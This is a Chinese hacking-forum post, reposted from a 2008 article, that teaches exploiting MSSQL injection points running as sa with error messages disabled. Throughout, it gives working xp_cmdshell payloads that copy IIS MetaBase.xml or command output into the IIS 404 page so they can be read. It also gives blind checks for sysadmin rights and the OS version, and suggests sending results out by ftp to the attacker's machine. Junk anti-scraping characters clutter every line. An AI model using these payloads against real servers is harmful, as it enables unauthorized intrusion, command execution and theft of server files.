遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
4 J/ }+ b7 m, d3 i& A) ?# | f# X4 j# y: E3 }
虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
# `# G2 A' b6 }' |. c
3 c# `3 h* ]/ O 这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。, ^1 E; E# |1 d. w9 C; z' c+ y
( q7 r4 X) T- N) Q IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm) S% }$ r0 n: m6 \3 [
+ H" G3 ~ z+ |+ J0 n 得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--" w1 Z3 K3 W$ l2 H$ w& D
- b4 Y4 R l2 W% ?4 @+ G+ {8 n ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
+ F$ ~; z: s( u+ y: F* m* D( W
7 `- d; R: s$ O$ q* ?* ] 执行命令得到回显
& ?% o5 S; w4 E6 ?! w' `* j
7 T* [* F, t4 A7 ]* I2 b 通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
- V/ }1 r Q) O$ Z9 J7 C' ~7 \
B* s5 r1 C# Z/ |' ^1 e 得到文件也shi相同,把文件copy到404b.htm就行了
3 t4 {3 X6 R! Z) l$ O% f/ y8 y y: ]- l
by 28ice, 2008/6/26
8 |& o2 R! W: F+ _/ x9 ]
. o! U% {6 [3 K) B1 _% m6 C3 B 摘自 28度的冰
1 p5 M5 H( I( s1 W u% _! u
: H- c+ B6 p- O! ? 盲注判断权限和操作系统版本
4 M7 Q5 z5 D- l
! C/ j) h, p/ N) S9 D6 ?5 N 首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?& ^* d: p6 N# r' M) N4 N4 K
2 g& \9 A- G' W0 B! X 最简单的,可能以用这样的方法:
8 ~; K( P5 Q% F7 |5 l4 v/ [# X- N0 |+ ?, h: W: w8 b
1=(select IS_SRVROLEMEMBER(’sysadmin’)). ~2 @9 [* `) J0 w6 p- l" v G6 Y' r/ ]3 q
0 r/ e, i# T, _2 W. B9 v5 q 当然,有些情况下,这个方法并不奏效。, W; ~1 I! V9 P, \
0 t4 \4 D# G! {( T* d- K6 K, j
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
* f' I5 B" p( k# S6 d% T6 Z) _1 n1 r/ y
有个3办法可能以解决这个问题# c3 q" F1 f- U' y5 l; `+ v' Z
1 \+ I! a; B6 c& F! z a.把执行结果写到404b.htm,具体请看我的上一篇文章# X. A& _, N T( N
; D8 d' A$ j; o b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
) E/ Y+ p) ~% P7 g
# _& M$ Q- q# _% u* T c.如果1433端口可能以连接,那干脆新建个sql登录$ B j# {7 Q( q8 s9 M) k9 k
1 |7 L6 a5 A" c5 Q2 D; X% z5 `
d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
`& t! b% @8 X, P( }
/ v" U, V( c4 `* u( N5 S1 r 还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
) @2 ~2 X2 _, ]/ S! d
7 j1 j4 X% g3 K6 \) f7 J! F 很简单
; s u, Y* ^' a w
, q. G9 ]8 L$ _" j7 s 执行systeminfo+ ]: f7 ]$ K3 q" z: l! G7 }
6 }. s6 b" O3 N
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。 |
发表于 2012-9-15 14:15:42
收藏
支持
反对